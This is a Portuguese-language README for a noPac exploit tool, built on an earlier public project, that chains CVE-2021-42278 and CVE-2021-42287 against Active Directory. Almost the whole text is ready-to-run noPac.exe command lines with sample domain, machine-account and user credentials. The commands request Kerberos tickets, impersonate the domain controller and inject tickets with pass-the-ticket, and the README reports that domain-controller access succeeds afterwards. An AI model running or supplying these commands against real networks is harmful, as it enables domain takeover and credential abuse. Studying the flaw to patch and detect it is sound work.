
CVE-2021-42287/CVE-2021-42278 Explorador
Este projeto teve origem no estudo dos princípios do noPac, com algumas alterações baseadas no projeto cube0x0. O código-fonte foi enriquecido com comentários pessoais de compreensão.
O artigo de análise da vulnerabilidade pode ser consultado no meu blog: Análise do noPac
noPac é uma combinação das vulnerabilidades CVE-2021-42278 (falsificação de sAMAccountName) e CVE-2021-42287 (engano do KDC). A exploração bem-sucedida requer que ambas as vulnerabilidades sejam satisfeitas simultaneamente.
Examples: Get TGT and ST
noPac.exe /domain DomainName /dc DomainController /mAccount MachineAccount /mPassword MachineAccountPassword /user DomainUser /pass DomainUserPassword
noPac.exe /domain missyou.com /dc dc.missyou.com /mAccount test1b$ /mPassword "TesT1b13!#@" /user wanglei /pass wanglei
noPac.exe /domain DomainName /dc DomainController /mAccount MachineAccount /mPassword MachineAccountPassword /user DomainUser /pass DomainUserPassword /service altservice
noPac.exe /domain missyou.com /dc dc.missyou.com /mAccount test1b$ /mPassword "TesT1b13!#@" /user wanglei /pass wanglei /service cifs
Examples: PTT
noPac.exe /domain DomainName /dc DomainController /mAccount MachineAccount /mPassword MachineAccountPassword /user DomainUser /pass DomainUserPassword /service altservice /ptt
noPac.exe /domain missyou.com /dc dc.missyou.com /mAccount test1b$ /mPassword "TesT1b13!#@" /user wanglei /pass wanglei /service cifs /ptt
noPac.exe /domain missyou.com /dc dc.missyou.com /mAccount test1b /mPassword "TesT1b13!#@" /user wanglei /pass wanglei /service cifs /ptt
O método mais comum é o PTT:
noPac.exe /domain missyou.com /dc dc.missyou.com /mAccount test1b$ /mPassword "TesT1b13!#@" /user wanglei /pass wanglei /service cifs /ptt
Não foi possível acessar o DC antes de explorar o noPac.

Explorando noPac.
noPac.exe /domain missyou.com /dc dc.missyou.com /mAccount test1b$ /mPassword "TesT1b13!#@" /user wanglei /pass wanglei /service cifs /ptt

Após o PTT, acesse novamente o DC na mesma janela para obter acesso bem-sucedido.

Observe que o programa só pode ser executado em máquinas com ambiente .NET 4.0+. O Windows Server 2012 já inclui o .NET 4.0 por padrão, enquanto o Windows Server 2008 inclui o .NET 3.5.
Para verificar a versão do .NET na máquina:
dir c:\Windows\Microsoft.NET\Framework64
